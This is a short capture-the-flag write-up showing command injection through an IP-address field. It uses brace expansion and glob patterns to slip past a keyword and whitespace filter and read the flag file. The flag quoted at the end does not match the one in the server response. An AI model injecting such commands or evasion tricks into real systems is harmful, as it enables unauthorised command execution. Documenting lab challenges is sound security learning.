- Testing a Simple Command Injection
Injected command: 127.0.0.1;ls
Server response: index.php
Result: Command injection successful, confirming the vulnerability.
2. Attempting to Read the File /flag
Injected command: 127.0.0.1;cat /flag
Server response: Flag is forbidden to read!
Result: Access to the flag is restricted.
3. Detection of Forbidden Words
After multiple tests, it was observed that any input containing the word ‘flag’ triggered the server to respond with: Flag is forbidden to read!
The characters &, $, \, and whitespace were detected as a hack.
4. Evading Detection
To bypass detection, the injection was modified as follows: 127.0.0.1;{cat,/f*l*a*g}
Note: 127.0.0.1;{cat,/f*l*a*g} and 127.0.0.1;{cat,/flag} are equivalent.
5. Executing the File
Executed command: 127.0.0.1;/f*l*a*g
Server response: Congratulations, this is the flag location: /tmp/flag_FXLNYL.txt
Result: Successfully located the flag file.
6. Reading the Flag
Injected command: 127.0.0.1;{cat,/tmp/f*l*a*g_FXLNYL.txt}
Server response: EGCERT{3x3cut3_703503_c0Mm@nD$W!th0ut$p@c3s}
Flag obtained: EGCERT{3x3cut3_703503_c0Mm@nD$_W!th0ut_$p@c3s}
